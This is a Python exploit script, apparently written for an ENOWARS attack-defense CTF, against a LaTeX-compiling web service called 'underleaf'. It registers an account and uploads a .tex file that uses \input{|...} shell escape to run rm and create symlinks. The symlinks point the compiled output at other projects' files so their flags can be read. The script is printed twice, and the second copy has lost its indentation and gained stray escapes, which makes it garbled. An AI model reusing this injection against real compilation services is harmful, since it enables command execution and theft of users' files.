KaoRz/underleaf.py

## underleaf.py
#!/usr/bin/env python3
import requests
import random
import string
import hashlib
import sys
import json

def get_random_str(length):
    letters = string.ascii_letters
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str

def hash_string(string):
    return hashlib.sha256(string.encode('utf-8')).hexdigest()

def get_nonce():
    nonce = get_random_str(32)
    while True:
        hash = hash_string(nonce)
        if hash[-4:] == "0000":
            break
        nonce = get_random_str(32)
    return nonce

def get_paths(ip):
    while True:
        try:
            r = requests.get("https://6.enowars.com/scoreboard/attack.json")
            resp = r.json()

            paths = []
            for entries in resp["services"]["underleaf"][ip]:
                json_r = json.loads(resp["services"]["underleaf"][ip][entries]['0'][0])
                paths.append(json_r["project_id"])
        except:
            continue
        break
    return paths

URL = "http://" + sys.argv[1] + ":4242/api/auth/register"

session = requests.Session()
payload = {"username": get_random_str(16), "password": "eazybobo"}
response = session.request("POST", URL, json=payload)
print(response.text)

session.headers.update({"Authorization": "Bearer " + response.json()["token"]})

URL = "http://" + sys.argv[1] + ":4242/api/project/create"

payload = {"name": "TeCameloBobo"}
response = session.request("POST", URL, json=payload)
print(response.text)

proj_id = response.json()["id"]

for flag_name in get_paths(sys.argv[1]):
    session.headers.update({"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8Ft20tnLvpNVqqQ"})

    URL = "http://" + sys.argv[1] + ":4242/api/files/upload/" + proj_id + "/main.tex"

    code = "\\documentclass[12pt]{minimal}\n  \\usepackage{verbatim}\n \\begin{document}\n \\input{|\"echo XGJlZ2lue3ZlcmJhdGltfQ== | base64 -d; rm /output/" + proj_id + ".pdf; ln -s ../../projects/" + flag_name[:2] + "/" + flag_name + "/main.tex /output/" + proj_id + ".pdf; exit 1; echo XGVuZHt2ZXJiYXRpbX0= | base64 -d\"} \n  \\end{document}"

    payload = "------WebKitFormBoundaryx8Ft20tnLvpNVqqQ\r\nContent-Disposition: form-data; name=\"file\"; filename=\"file\"\r\nContent-Type: text/plain\r\n\r\n" + \
            code + "\r\n------WebKitFormBoundaryx8Ft20tnLvpNVqqQ--\r\n"
    response = session.request("POST", URL, data=payload)
    print(response.text)

    del session.headers["Content-Type"]

    pow_accepted = False
    while not pow_accepted:
        URL = "http://" + sys.argv[1] + ":4242/api/latex/compile/" + proj_id
        payload = {'file': '/main.tex', 'proofOfWork': get_nonce()}
        response = session.request("POST", URL, json=payload)
        print(response.text)

        if response.json()["status"] == "ok":
            break

    URL = "http://" + sys.argv[1] + ":4242/api/latex/output/" + proj_id
    response = session.request("GET", URL)
    print(response.text, flush=True)
	#!/usr/bin/env python3
	import requests
	import random
	import string
	import hashlib
	import sys
	import json

	def get_random_str(length):
	letters = string.ascii_letters
	result_str = ''.join(random.choice(letters) for i in range(length))
	return result_str

	def hash_string(string):
	return hashlib.sha256(string.encode('utf-8')).hexdigest()

	def get_nonce():
	nonce = get_random_str(32)
	while True:
	hash = hash_string(nonce)
	if hash[-4:] == "0000":
	break
	nonce = get_random_str(32)
	return nonce

	def get_paths(ip):
	while True:
	try:
	r = requests.get("https://6.enowars.com/scoreboard/attack.json")
	resp = r.json()

	paths = []
	for entries in resp["services"]["underleaf"][ip]:
	json_r = json.loads(resp["services"]["underleaf"][ip][entries]['0'][0])
	paths.append(json_r["project_id"])
	except:
	continue
	break
	return paths

	URL = "http://" + sys.argv[1] + ":4242/api/auth/register"

	session = requests.Session()
	payload = {"username": get_random_str(16), "password": "eazybobo"}
	response = session.request("POST", URL, json=payload)
	print(response.text)

	session.headers.update({"Authorization": "Bearer " + response.json()["token"]})

	URL = "http://" + sys.argv[1] + ":4242/api/project/create"

	payload = {"name": "TeCameloBobo"}
	response = session.request("POST", URL, json=payload)
	print(response.text)

	proj_id = response.json()["id"]

	for flag_name in get_paths(sys.argv[1]):
	session.headers.update({"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8Ft20tnLvpNVqqQ"})

	URL = "http://" + sys.argv[1] + ":4242/api/files/upload/" + proj_id + "/main.tex"

	code = "\\documentclass[12pt]{minimal}\n \\usepackage{verbatim}\n \\begin{document}\n \\input{\|\"echo XGJlZ2lue3ZlcmJhdGltfQ== \| base64 -d; rm /output/" + proj_id + ".pdf; ln -s ../../projects/" + flag_name[:2] + "/" + flag_name + "/main.tex /output/" + proj_id + ".pdf; exit 1; echo XGVuZHt2ZXJiYXRpbX0= \| base64 -d\"} \n \\end{document}"

	payload = "------WebKitFormBoundaryx8Ft20tnLvpNVqqQ\r\nContent-Disposition: form-data; name=\"file\"; filename=\"file\"\r\nContent-Type: text/plain\r\n\r\n" + \
	code + "\r\n------WebKitFormBoundaryx8Ft20tnLvpNVqqQ--\r\n"
	response = session.request("POST", URL, data=payload)
	print(response.text)

	del session.headers["Content-Type"]

	pow_accepted = False
	while not pow_accepted:
	URL = "http://" + sys.argv[1] + ":4242/api/latex/compile/" + proj_id
	payload = {'file': '/main.tex', 'proofOfWork': get_nonce()}
	response = session.request("POST", URL, json=payload)
	print(response.text)

	if response.json()["status"] == "ok":
	break

	URL = "http://" + sys.argv[1] + ":4242/api/latex/output/" + proj_id
	response = session.request("GET", URL)
	print(response.text, flush=True)